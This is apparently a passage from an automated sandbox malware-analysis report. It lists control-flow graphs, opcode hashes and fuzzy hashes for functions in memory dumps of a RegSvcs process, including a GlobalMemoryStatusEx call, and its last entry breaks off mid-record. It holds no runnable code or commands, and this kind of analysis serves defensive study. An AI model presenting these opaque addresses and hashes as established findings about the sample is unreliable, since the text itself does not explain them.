1953->1965 1984 6b0c544-6b0c547 1954->1984 1966 6b0c3c5-6b0c3c8 1956->1966 1967 6b0c3cd-6b0c3d0 1956->1967 1957->1956 1962 6b0c465-6b0c468 1960->1962 1963 6b0c455-6b0c45e 1960->1963 1961->1960 1971 6b0c488-6b0c48b 1962->1971 1972 6b0c46a-6b0c483 1962->1972 1969 6b0c460 1963->1969 1970 6b0c4b9-6b0c4c2 1963->1970 1974 6b0c5c4-6b0c5e0 1965->1974 1975 6b0c5e5-6b0c5e8 1965->1975 1966->1967 1976 6b0c3d2-6b0c3d8 1967->1976 1977 6b0c3dd-6b0c3e0 1967->1977 1969->1962 1970->1937 1979 6b0c4c8-6b0c4cc 1970->1979 1985 6b0c495-6b0c498 1971->1985 1986 6b0c48d-6b0c492 1971->1986 1972->1971 1974->1975 1982 6b0c608-6b0c60b 1975->1982 1983 6b0c5ea-6b0c603 1975->1983 1976->1977 1980 6b0c3f0-6b0c3f3 1977->1980 1981 6b0c3e2-6b0c3e9 1977->1981 1988 6b0c4d1-6b0c4d4 1979->1988 1990 6b0c3f5-6b0c411 1980->1990 1991 6b0c416-6b0c419 1980->1991 1981->1951 1989 6b0c3eb 1981->1989 1998 6b0c622-6b0c625 1982->1998 1999 6b0c60d-6b0c61b 1982->1999 1983->1982 1995 6b0c559-6b0c55c 1984->1995 1996 6b0c549-6b0c554 1984->1996 2000 6b0c4b4-6b0c4b7 1985->2000 2001 6b0c49a-6b0c4a9 1985->2001 1986->1985 2002 6b0c4d6-6b0c4f8 1988->2002 2003 6b0c4fd-6b0c500 1988->2003 1989->1980 1990->1991 1991->1931 1991->1945 2005 6b0c566-6b0c568 1995->2005 2006 6b0c55e-6b0c561 1995->2006 1996->1995 2007 6b0c627-6b0c640 1998->2007 2008 6b0c64d-6b0c650 1998->2008 1999->2007 2026 6b0c61d 1999->2026 2000->1970 2000->1988 2001->2006 2028 6b0c4af 2001->2028 2002->2003 2010 6b0c502-6b0c513 2003->2010 2011 6b0c518-6b0c51b 2003->2011 2017 6b0c56a 2005->2017 2018 6b0c56f-6b0c572 2005->2018 2006->2005 2034 6b0c66f-6b0c67b 2007->2034 2039 6b0c642-6b0c64c 2007->2039 2015 6b0c652-6b0c65c 2008->2015 2016 6b0c65d-6b0c65f 2008->2016 2010->2011 2011->1963 2022 6b0c521-6b0c524 2011->2022 2024 6b0c661 2016->2024 2025 6b0c666-6b0c669 2016->2025 2017->2018 2018->1917 2027 6b0c578-6b0c582 2018->2027 2022->1984 2032 6b0c526 2022->2032 2024->2025 2025->1965 2025->2034 2026->1998 2028->2000 2032->1954 2037 6b0c681-6b0c68a 2034->2037 2038 6b0c81a-6b0c824 2034->2038 2041 6b0c690-6b0c6af 2037->2041 2042 6b0c825-6b0c85e 2037->2042 2052 6b0c6b5-6b0c6be 2041->2052 2053 6b0c808-6b0c814 2041->2053 2047 6b0c860-6b0c863 2042->2047 2049 6b0c869-6b0c877 2047->2049 2050 6b0ca1f-6b0ca22 2047->2050 2057 6b0c87e-6b0c880 2049->2057 2054 6b0ca24-6b0ca40 2050->2054 2055 6b0ca45-6b0ca47 2050->2055 2052->2042 2056 6b0c6c4-6b0c6f3 call 6b06608 2052->2056 2053->2037 2053->2038 2054->2055 2058 6b0ca49 2055->2058 2059 6b0ca4e-6b0ca51 2055->2059 2075 6b0c735-6b0c74b 2056->2075 2076 6b0c6f5-6b0c72d 2056->2076 2061 6b0c882-6b0c885 2057->2061 2062 6b0c897-6b0c8c1 2057->2062 2058->2059 2059->2047 2063 6b0ca57-6b0ca60 2059->2063 2061->2063 2071 6b0ca14-6b0ca1e 2062->2071 2072 6b0c8c7-6b0c8d0 2062->2072 2073 6b0c8d6-6b0c9e5 call 6b06608 2072->2073 2074 6b0c9ed-6b0ca12 2072->2074 2073->2072 2125 6b0c9eb 2073->2125 2074->2063 2081 6b0c769-6b0c77f 2075->2081 2082 6b0c74d-6b0c761 2075->2082 2076->2075 2091 6b0c781-6b0c795 2081->2091 2092 6b0c79d-6b0c7b0 2081->2092 2082->2081 2091->2092 2097 6b0c7b2-6b0c7bc 2092->2097 2098 6b0c7be 2092->2098 2099 6b0c7c3-6b0c7c5 2097->2099 2098->2099 2101 6b0c7f6-6b0c802 2099->2101 2102 6b0c7c7-6b0c7cc 2099->2102 2101->2052 2101->2053 2103 6b0c7da 2102->2103 2104 6b0c7ce-6b0c7d8 2102->2104 2106 6b0c7df-6b0c7e1 2103->2106 2104->2106 2106->2101 2107 6b0c7e3-6b0c7ef 2106->2107 2107->2101 2125->2071
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a0d276c50d4b0869d0ef725cbcfb6f2fdc562a18f3231613adec108373f98fe
                          • Instruction ID: 2e17fbfd6eb01fb67c5e95a438b2012a78bf38938132fc3169950aa67db2cfae
                          • Opcode Fuzzy Hash: 6a0d276c50d4b0869d0ef725cbcfb6f2fdc562a18f3231613adec108373f98fe
                          • Instruction Fuzzy Hash: 8532A2B5B002058FEB54DF68D990BADBFB2FB88310F248569D505EB391DB39EC418B91
                          Function 06B05650 Relevance: .6, Instructions: 585COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2328 6b05650-6b0566d 2329 6b0566f-6b05672 2328->2329 2330 6b05683-6b05686 2329->2330 2331 6b05674-6b05678 2329->2331 2334 6b056b0-6b056b6 2330->2334 2335 6b05688-6b0568b 2330->2335 2332 6b05819-6b05826 2331->2332 2333 6b0567e 2331->2333 2333->2330 2336 6b056b8 2334->2336 2337 6b056cc-6b056d2 2334->2337 2338 6b05695-6b05698 2335->2338 2339 6b0568d-6b05690 2335->2339 2342 6b056bd-6b056c0 2336->2342 2343 6b05827-6b05853 2337->2343 2344 6b056d8-6b056e0 2337->2344 2340 6b0569a-6b056a0 2338->2340 2341 6b056ab-6b056ae 2338->2341 2339->2338 2345 6b056a6 2340->2345 2346 6b0578f-6b05799 2340->2346 2341->2334 2341->2342 2347 6b056c2-6b056c4 2342->2347 2348 6b056c7-6b056ca 2342->2348 2359 6b0585d-6b05860 2343->2359 2344->2343 2349 6b056e6-6b056f3 2344->2349 2345->2341 2353 6b057a0-6b057a2 2346->2353 2347->2348 2348->2337 2350 6b05702-6b05705 2348->2350 2349->2343 2352 6b056f9-6b056fd 2349->2352 2354 6b05707-6b05719 2350->2354 2355 6b0571e-6b05721 2350->2355 2352->2350 2358 6b057a7-6b057aa 2353->2358 2354->2355 2356 6b05723-6b05742 2355->2356 2357 6b05747-6b0574a 2355->2357 2356->2357 2363 6b05767-6b0576a 2357->2363 2364 6b0574c-6b05762 2357->2364 2361 6b057b2-6b057b5 2358->2361 2362 6b057ac-6b057ad 2358->2362 2365 6b05862-6b05873 2359->2365 2366 6b05878-6b0587b 2359->2366 2370 6b057c1-6b057c4 2361->2370 2371 6b057b7-6b057c0 2361->2371 2362->2361 2372 6b05778-6b0577b 2363->2372 2373 6b0576c-6b05773 2363->2373 2364->2363 2365->2366 2367 6b0587d-6b05884 2366->2367 2368 6b0588f-6b05892 2366->2368 2374 6b0588a 2367->2374 2375 6b0593e-6b05945 2367->2375 2376 6b058a3-6b058a6 2368->2376 2377 6b05894-6b0589e 2368->2377 2370->2340 2378 6b057ca-6b057cd 2370->2378 2380 6b0578a-6b0578d 2372->2380 2381 6b0577d-6b05783 2372->2381 2373->2372 2374->2368 2384 6b058c8-6b058cb 2376->2384 2385 6b058a8-6b058ac 2376->2385 2377->2376 2386 6b057e1-6b057e4 2378->2386 2387 6b057cf-6b057dc 2378->2387 2380->2346 2380->2358 2388 6b05785 2381->2388 2389 6b057ff-6b05802 2381->2389 2394 6b058e5-6b058e8 2384->2394 2395 6b058cd-6b058d1 2384->2395 2392 6b058b2-6b058ba 2385->2392 2393 6b05946-6b05983 2385->2393 2396 6b057e6-6b057f5 2386->2396 2397 6b057fa-6b057fd 2386->2397 2387->2386 2388->2380 2390 6b05807-6b05809 2389->2390 2398 6b05810-6b05813 2390->2398 2399 6b0580b 2390->2399 2392->2393 2400 6b058c0-6b058c3 2392->2400 2413 6b05985-6b05988 2393->2413 2403 6b058f2-6b058f5 2394->2403 2404 6b058ea-6b058f1 2394->2404 2395->2393 2401 6b058d3-6b058db 2395->2401 2396->2397 2397->2389 2397->2390 2398->2329 2398->2332 2399->2398 2400->2384 2401->2393 2408 6b058dd-6b058e0 2401->2408 2406 6b058f7-6b058fb 2403->2406 2407 6b0590f-6b05912 2403->2407 2406->2393 2410 6b058fd-6b05905 2406->2410 2411 6b05914-6b05918 2407->2411 2412 6b0592c-6b0592e 2407->2412 2408->2394 2410->2393 2416 6b05907-6b0590a 2410->2416 2411->2393 2417 6b0591a-6b05922 2411->2417 2418 6b05930 2412->2418 2419 6b05935-6b05938 2412->2419 2414 6b059a3-6b059a6 2413->2414 2415 6b0598a-6b0599c 2413->2415 2420 6b059c5-6b059c8 2414->2420 2421 6b059a8-6b059ba 2414->2421 2415->2421 2426 6b0599e 2415->2426 2416->2407 2417->2393 2422 6b05924-6b05927 2417->2422 2418->2419 2419->2359 2419->2375 2424 6b059e3-6b059e6 2420->2424 2425 6b059ca-6b059dc 2420->2425 2432 6b059c0 2421->2432 2433 6b05a49-6b05a4e 2421->2433 2422->2412 2428 6b05a01-6b05a04 2424->2428 2429 6b059e8-6b059fa 2424->2429 2430 6b05a06-6b05a19 2425->2430 2439 6b059de 2425->2439 2426->2414 2428->2430 2431 6b05a1c-6b05a1f 2428->2431 2429->2433 2442 6b059fc 2429->2442 2437 6b05a21-6b05a24 2431->2437 2438 6b05a64-6b05bd0 2431->2438 2432->2420 2435 6b05a51-6b05a54 2433->2435 2440 6b05a56-6b05a58 2435->2440 2441 6b05a5b-6b05a5e 2435->2441 2444 6b05a26-6b05a38 2437->2444 2445 6b05a3f-6b05a42 2437->2445 2477 6b05d05-6b05d18 2438->2477 2478 6b05bd6-6b05bdd 2438->2478 2439->2424 2440->2441 2441->2438 2446 6b05d1b-6b05d1e 2441->2446 2442->2428 2444->2433 2455 6b05a3a 2444->2455 2445->2438 2448 6b05a44-6b05a47 2445->2448 2449 6b05d20-6b05d25 2446->2449 2450 6b05d28-6b05d2a 2446->2450 2448->2433 2448->2435 2449->2450 2452 6b05d31-6b05d34 2450->2452 2453 6b05d2c 2450->2453 2452->2413 2456 6b05d3a-6b05d43 2452->2456 2453->2452 2455->2445 2479 6b05c90-6b05c97 2478->2479 2480 6b05be3-6b05c15 2478->2480 2479->2477 2481 6b05c99-6b05ccc 2479->2481 2491 6b05c17 2480->2491 2492 6b05c1a-6b05c5b 2480->2492 2493 6b05cd1-6b05cfe 2481->2493 2494 6b05cce 2481->2494 2491->2492 2502 6b05c73-6b05c7a 2492->2502 2503 6b05c5d-6b05c6e 2492->2503 2493->2456 2494->2493 2505 6b05c82-6b05c84 2502->2505 2503->2456 2505->2456
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1ce74d22c7ce02d288c6905b75e8a32b7db609a4278949a7bb6acf481e22466
                          • Instruction ID: bb5fcc60920e78e5d692e86fd4bac02b691a1413f8f857a2f4327e2d36f0ce98
                          • Opcode Fuzzy Hash: d1ce74d22c7ce02d288c6905b75e8a32b7db609a4278949a7bb6acf481e22466
                          • Instruction Fuzzy Hash: 2D12B6B2F002048FEB74DB64D98076EBFA2EB85310F2494A9D8559B785DB34EC45CF90
                          Function 06B07DE0 Relevance: .5, Instructions: 474COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3177 6b07de0-6b07dfe 3178 6b07e00-6b07e03 3177->3178 3179 6b07e24-6b07e27 3178->3179 3180 6b07e05-6b07e1f 3178->3180 3181 6b07e29-6b07e37 3179->3181 3182 6b07e3e-6b07e41 3179->3182 3180->3179 3189 6b07e86-6b07e9c 3181->3189 3190 6b07e39 3181->3190 3183 6b07e43-6b07e5f 3182->3183 3184 6b07e64-6b07e67 3182->3184 3183->3184 3187 6b07e74-6b07e76 3184->3187 3188 6b07e69-6b07e73 3184->3188 3192 6b07e78 3187->3192 3193 6b07e7d-6b07e80 3187->3193 3197 6b07ea2-6b07eab 3189->3197 3198 6b080b7-6b080c1 3189->3198 3190->3182 3192->3193 3193->3178 3193->3189 3199 6b07eb1-6b07ece 3197->3199 3200 6b080c2-6b080d4 3197->3200 3207 6b080a4-6b080b1 3199->3207 3208 6b07ed4-6b07efc 3199->3208 3203 6b080e0-6b080f7 3200->3203 3204 6b080d6-6b080de 3200->3204 3206 6b080f9-6b080fc 3203->3206 3204->3203 3209 6b080fe-6b0811a 3206->3209 3210 6b0811f-6b08122 3206->3210 3207->3197 3207->3198 3208->3207 3232 6b07f02-6b07f0b 3208->3232 3209->3210 3211 6b08128-6b08134 3210->3211 3212 6b081cf-6b081d2 3210->3212 3217 6b0813f-6b08141 3211->3217 3213 6b08407-6b08409 3212->3213 3214 6b081d8-6b081e7 3212->3214 3218 6b08410-6b08413 3213->3218 3219 6b0840b 3213->3219 3230 6b08206-6b0824a 3214->3230 3231 6b081e9-6b08204 3214->3231 3220 6b08143-6b08149 3217->3220 3221 6b08159-6b0815d 3217->3221 3218->3206 3222 6b08419-6b08422 3218->3222 3219->3218 3226 6b0814b 3220->3226 3227 6b0814d-6b0814f 3220->3227 3228 6b0816b 3221->3228 3229 6b0815f-6b08169 3221->3229 3226->3221 3227->3221 3233 6b08170-6b08172 3228->3233 3229->3233 3239 6b08250-6b08261 3230->3239 3240 6b083db-6b083f1 3230->3240 3231->3230 3232->3200 3234 6b07f11-6b07f2d 3232->3234 3236 6b08174-6b08177 3233->3236 3237 6b08189-6b081c2 3233->3237 3245 6b08092-6b0809e 3234->3245 3246 6b07f33-6b07f5d 3234->3246 3236->3222 3237->3214 3260 6b081c4-6b081ce 3237->3260 3250 6b083c6-6b083d5 3239->3250 3251 6b08267-6b08284 3239->3251 3240->3213 3245->3207 3245->3232 3261 6b07f63-6b07f8b 3246->3261 3262 6b08088-6b0808d 3246->3262 3250->3239 3250->3240 3251->3250 3263 6b0828a-6b08380 call 6b06608 3251->3263 3261->3262 3269 6b07f91-6b07fbf 3261->3269 3262->3245 3312 6b08382-6b0838c 3263->3312 3313 6b0838e 3263->3313 3269->3262 3274 6b07fc5-6b07fce 3269->3274 3274->3262 3276 6b07fd4-6b08006 3274->3276 3283 6b08011-6b0802d 3276->3283 3284 6b08008-6b0800c 3276->3284 3283->3245 3287 6b0802f-6b08086 call 6b06608 3283->3287 3284->3262 3286 6b0800e 3284->3286 3286->3283 3287->3245 3314 6b08393-6b08395 3312->3314 3313->3314 3314->3250 3315 6b08397-6b0839c 3314->3315 3316 6b083aa 3315->3316 3317 6b0839e-6b083a8 3315->3317 3318 6b083af-6b083b1 3316->3318 3317->3318 3318->3250 3319 6b083b3-6b083bf 3318->3319 3319->3250
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0d78772a6efbfd54bf165072bfa6a46eed6afd7aa2aa04878de32c41645fcbc
                          • Instruction ID: 4ce4d0cca06afd89b057a9d26070da27f638b95a7e3ba18b8df472f397a39e94
                          • Opcode Fuzzy Hash: a0d78772a6efbfd54bf165072bfa6a46eed6afd7aa2aa04878de32c41645fcbc
                          • Instruction Fuzzy Hash: BF028E71B012058FEF54DB69D850AAEBFB2FF88310F1485A9D505AB390EB35ED42CB91
                          Function 0300EB50 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 521 300eb50-300eb6b 522 300eb95-300ebab 521->522 523 300eb6d-300eb94 521->523 543 300ebad call 300eb50 522->543 544 300ebad call 300ec38 522->544 526 300ebb2-300ebb4 527 300ebb6-300ebb9 526->527 528 300ebba-300ec19 526->528 535 300ec1b-300ec1e 528->535 536 300ec1f-300ecac GlobalMemoryStatusEx 528->536 539 300ecb5-300ecdd 536->539 540 300ecae-300ecb4 536->540 540->539 543->526 544->526
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662516844.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_3000000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8ac8feb540eaef67d49c0dcb27a212a751845b8d3e25d14693bc78e235f9f39
                          • Instruction ID: de90afd83155bc3f29e5998e2290151e7f8315a77884b6e464fbaa391c1c8460
                          • Opcode Fuzzy Hash: f8ac8feb540eaef67d49c0dcb27a212a751845b8d3e25d14693bc78e235f9f39
                          • Instruction Fuzzy Hash: B3412772D143498FD714CF79D4047AABFF1AF89210F1985ABD444A7391D7389845CBA1
                          Function 0300EC38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 545 300ec38-300ecac GlobalMemoryStatusEx 547 300ecb5-300ecdd 545->547 548 300ecae-300ecb4 545->548 548->547
                          APIs
                          • GlobalMemoryStatusEx.KERNELBASE ref: 0300EC9F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662516844.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_3000000_RegSvcs.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID:
                          • API String ID: 1890195054-0
                          • Opcode ID: 7b53043523b3f8c37b442a379ec1868338039080b6d311b815daac0db7971a7e
                          • Instruction ID: 1d029f55406ba4d4ea89628ee3fae5899f7a9295c573245d6730283f1f32924f
                          • Opcode Fuzzy Hash: 7b53043523b3f8c37b442a379ec1868338039080b6d311b815daac0db7971a7e
                          • Instruction Fuzzy Hash: 3F1123B1C0065A9BDB10CFAAC444BDEFBF4AF48320F14816AD818B7240D378A944CFA1
                          Function 06B0CFB0 Relevance: .8, Instructions: 800COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1371 6b0cfb0-6b0cfcb 1372 6b0cfcd-6b0cfd0 1371->1372 1373 6b0cfd2-6b0cfd4 1372->1373 1374 6b0cfdf-6b0cfe2 1372->1374 1377 6b0d357-6b0d360 1373->1377 1378 6b0cfda 1373->1378 1375 6b0cfe4-6b0cfe9 1374->1375 1376 6b0cfec-6b0cfef 1374->1376 1375->1376 1379 6b0cff1-6b0d000 1376->1379 1380 6b0d038-6b0d03b 1376->1380 1381 6b0d362-6b0d367 1377->1381 1382 6b0d36f-6b0d37b 1377->1382 1378->1374 1383 6b0d002-6b0d007 1379->1383 1384 6b0d00f-6b0d01b 1379->1384 1387 6b0d03d-6b0d059 1380->1387 1388 6b0d05e-6b0d061 1380->1388 1381->1382 1385 6b0d381-6b0d395 1382->1385 1386 6b0d48c-6b0d491 1382->1386 1383->1384 1391 6b0d021-6b0d033 1384->1391 1392 6b0d9cd-6b0da06 1384->1392 1403 6b0d499 1385->1403 1404 6b0d39b-6b0d3ad 1385->1404 1386->1403 1387->1388 1389 6b0d063-6b0d0a5 1388->1389 1390 6b0d0aa-6b0d0ad 1388->1390 1389->1390 1395 6b0d0b3-6b0d0b6 1390->1395 1396 6b0d49c-6b0d4a8 1390->1396 1391->1380 1407 6b0da08-6b0da0b 1392->1407 1405 6b0d0b8-6b0d0fa 1395->1405 1406 6b0d0ff-6b0d102 1395->1406 1401 6b0d2fe-6b0d30d 1396->1401 1402 6b0d4ae-6b0d79b 1396->1402 1410 6b0d31c-6b0d328 1401->1410 1411 6b0d30f-6b0d314 1401->1411 1584 6b0d7a1-6b0d7a7 1402->1584 1585 6b0d9c2-6b0d9cc 1402->1585 1403->1396 1427 6b0d3d1-6b0d3d3 1404->1427 1428 6b0d3af-6b0d3b5 1404->1428 1405->1406 1408 6b0d104-6b0d11a 1406->1408 1409 6b0d11f-6b0d122 1406->1409 1414 6b0da0d-6b0da39 1407->1414 1415 6b0da3e-6b0da41 1407->1415 1408->1409 1419 6b0d124-6b0d166 1409->1419 1420 6b0d16b-6b0d16e 1409->1420 1410->1392 1418 6b0d32e-6b0d340 1410->1418 1411->1410 1414->1415 1425 6b0da43-6b0da5f 1415->1425 1426 6b0da64-6b0da67 1415->1426 1441 6b0d345-6b0d347 1418->1441 1419->1420 1423 6b0d170-6b0d172 1420->1423 1424 6b0d17d-6b0d180 1420->1424 1423->1403 1435 6b0d178 1423->1435 1437 6b0d182-6b0d1c4 1424->1437 1438 6b0d1c9-6b0d1cc 1424->1438 1425->1426 1432 6b0da76-6b0da78 1426->1432 1433 6b0da69 1426->1433 1448 6b0d3dd-6b0d3e9 1427->1448 1439 6b0d3b7 1428->1439 1440 6b0d3b9-6b0d3c5 1428->1440 1442 6b0da7a 1432->1442 1443 6b0da7f-6b0da82 1432->1443 1631 6b0da69 call 6b0db25 1433->1631 1632 6b0da69 call 6b0db38 1433->1632 1435->1424 1437->1438 1444 6b0d215-6b0d218 1438->1444 1445 6b0d1ce-6b0d210 1438->1445 1447 6b0d3c7-6b0d3cf 1439->1447 1440->1447 1451 6b0d349 1441->1451 1452 6b0d34e-6b0d351 1441->1452 1442->1443 1443->1407 1455 6b0da84-6b0da93 1443->1455 1458 6b0d261-6b0d264 1444->1458 1459 6b0d21a-6b0d25c 1444->1459 1445->1444 1447->1448 1477 6b0d3f7 1448->1477 1478 6b0d3eb-6b0d3f5 1448->1478 1451->1452 1452->1372 1452->1377 1454 6b0da6f-6b0da71 1454->1432 1480 6b0da95-6b0daf8 call 6b06608 1455->1480 1481 6b0dafa-6b0db0f 1455->1481 1463 6b0d266-6b0d2a8 1458->1463 1464 6b0d2ad-6b0d2b0 1458->1464 1459->1458 1463->1464 1472 6b0d2b2-6b0d2f4 1464->1472 1473 6b0d2f9-6b0d2fc 1464->1473 1472->1473 1473->1401 1473->1441 1483 6b0d3fc-6b0d3fe 1477->1483 1478->1483 1480->1481 1502 6b0db10 1481->1502 1483->1403 1491 6b0d404-6b0d420 call 6b06608 1483->1491 1512 6b0d422-6b0d427 1491->1512 1513 6b0d42f-6b0d43b 1491->1513 1502->1502 1512->1513 1513->1386 1518 6b0d43d-6b0d48a 1513->1518 1518->1403 1586 6b0d7b6-6b0d7bf 1584->1586 1587 6b0d7a9-6b0d7ae 1584->1587 1586->1392 1588 6b0d7c5-6b0d7d8 1586->1588 1587->1586 1590 6b0d9b2-6b0d9bc 1588->1590 1591 6b0d7de-6b0d7e4 1588->1591 1590->1584 1590->1585 1592 6b0d7f3-6b0d7fc 1591->1592 1593 6b0d7e6-6b0d7eb 1591->1593 1592->1392 1594 6b0d802-6b0d823 1592->1594 1593->1592 1597 6b0d832-6b0d83b 1594->1597 1598 6b0d825-6b0d82a 1594->1598 1597->1392 1599 6b0d841-6b0d85e 1597->1599 1598->1597 1599->1590 1602 6b0d864-6b0d86a 1599->1602 1602->1392 1603 6b0d870-6b0d889 1602->1603 1605 6b0d9a5-6b0d9ac 1603->1605 1606 6b0d88f-6b0d8b6 1603->1606 1605->1590 1605->1602 1606->1392 1609 6b0d8bc-6b0d8c6 1606->1609 1609->1392 1610 6b0d8cc-6b0d8e3 1609->1610 1612 6b0d8f2-6b0d90d 1610->1612 1613 6b0d8e5-6b0d8f0 1610->1613 1612->1605 1618 6b0d913-6b0d92c call 6b06608 1612->1618 1613->1612 1622 6b0d93b-6b0d944 1618->1622 1623 6b0d92e-6b0d933 1618->1623 1622->1392 1624 6b0d94a-6b0d99e 1622->1624 1623->1622 1624->1605 1631->1454 1632->1454
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 677ae1962c90ad234f5f3f7dc8eb29923ead1d4aede81daf38fd7c2a62969b35
                          • Instruction ID: c122e125ab38d83d79eba826bcfddd6924b04325b2f1f0fcf6a40e46736ed94d
                          • Opcode Fuzzy Hash: 677ae1962c90ad234f5f3f7dc8eb29923ead1d4aede81daf38fd7c2a62969b35
                          • Instruction Fuzzy Hash: 60626070A00209CFDB55EFA8D590A5DBBF2FF84300B648AA8D045AF395DB75ED46CB81
                          Function 06B0AD38 Relevance: .4, Instructions: 397COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3321 6b0ad38-6b0ad56 3322 6b0ad58-6b0ad5b 3321->3322 3323 6b0ad61-6b0ad64 3322->3323 3324 6b0af55-6b0af5e 3322->3324 3327 6b0ad66-6b0ad6b 3323->3327 3328 6b0ad6e-6b0ad71 3323->3328 3325 6b0ada3-6b0adac 3324->3325 3326 6b0af64-6b0af6e 3324->3326 3334 6b0adb2-6b0adb6 3325->3334 3335 6b0af6f-6b0af79 3325->3335 3327->3328 3329 6b0ad73-6b0ad86 3328->3329 3330 6b0ad8b-6b0ad8e 3328->3330 3329->3330 3332 6b0ad90-6b0ad99 3330->3332 3333 6b0ad9e-6b0ada1 3330->3333 3332->3333 3333->3325 3337 6b0adbb-6b0adbe 3333->3337 3334->3337 3341 6b0af23 3335->3341 3342 6b0af7b-6b0af7d 3335->3342 3339 6b0adc0-6b0adcd 3337->3339 3340 6b0add2-6b0add5 3337->3340 3339->3340 3343 6b0add7-6b0adf3 3340->3343 3344 6b0adf8-6b0adfb 3340->3344 3347 6b0af27-6b0af4b 3341->3347 3342->3347 3348 6b0af7f-6b0afa6 3342->3348 3343->3344 3345 6b0ae0c-6b0ae0e 3344->3345 3346 6b0adfd-6b0ae01 3344->3346 3352 6b0ae10 3345->3352 3353 6b0ae15-6b0ae18 3345->3353 3346->3326 3351 6b0ae07 3346->3351 3372 6b0af52 3347->3372 3358 6b0afa8-6b0afab 3348->3358 3351->3345 3352->3353 3353->3322 3355 6b0ae1e-6b0ae42 3353->3355 3355->3372 3373 6b0ae48-6b0ae57 3355->3373 3359 6b0afb8-6b0afbb 3358->3359 3360 6b0afad-6b0afb1 3358->3360 3365 6b0afca-6b0afcd 3359->3365 3366 6b0afbd 3359->3366 3363 6b0afd3-6b0b00e 3360->3363 3364 6b0afb3 3360->3364 3376 6b0b201-6b0b214 3363->3376 3377 6b0b014-6b0b020 3363->3377 3364->3359 3365->3363 3369 6b0b236-6b0b239 3365->3369 3449 6b0afbd call 6b0b2a0 3366->3449 3450 6b0afbd call 6b0b292 3366->3450 3374 6b0b23b-6b0b257 3369->3374 3375 6b0b25c-6b0b25f 3369->3375 3371 6b0afc3-6b0afc5 3371->3365 3372->3324 3385 6b0ae59-6b0ae5f 3373->3385 3386 6b0ae6f-6b0aeaa call 6b06608 3373->3386 3374->3375 3378 6b0b261-6b0b26b 3375->3378 3379 6b0b26c-6b0b26e 3375->3379 3382 6b0b216 3376->3382 3393 6b0b040-6b0b084 3377->3393 3394 6b0b022-6b0b03b 3377->3394 3383 6b0b270 3379->3383 3384 6b0b275-6b0b278 3379->3384 3392 6b0b217 3382->3392 3383->3384 3384->3358 3388 6b0b27e-6b0b288 3384->3388 3390 6b0ae61 3385->3390 3391 6b0ae63-6b0ae65 3385->3391 3405 6b0aec2-6b0aed9 3386->3405 3406 6b0aeac-6b0aeb2 3386->3406 3390->3386 3391->3386 3392->3392 3410 6b0b0a0-6b0b0df 3393->3410 3411 6b0b086-6b0b098 3393->3411 3394->3382 3418 6b0aef1-6b0af02 3405->3418 3419 6b0aedb-6b0aee1 3405->3419 3408 6b0aeb4 3406->3408 3409 6b0aeb6-6b0aeb8 3406->3409 3408->3405 3409->3405 3415 6b0b0e5-6b0b1c0 call 6b06608 3410->3415 3416 6b0b1c6-6b0b1db 3410->3416 3411->3410 3415->3416 3416->3376 3427 6b0af04-6b0af0a 3418->3427 3428 6b0af1a-6b0af1c 3418->3428 3423 6b0aee3 3419->3423 3424 6b0aee5-6b0aee7 3419->3424 3423->3418 3424->3418 3430 6b0af0c 3427->3430 3431 6b0af0e-6b0af10 3427->3431 3428->3341 3430->3428 3431->3428 3449->3371 3450->3371
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e4426c42ebaba77ccfdedd3761a3541b350d61df8a43cd6f2e04d322ccf8ae5
                          • Instruction ID: 8eecea0af1d7d03edcf2215d5f6ae1556525dfc5c1478e131c335fb2d8868952
                          • Opcode Fuzzy Hash: 2e4426c42ebaba77ccfdedd3761a3541b350d61df8a43cd6f2e04d322ccf8ae5
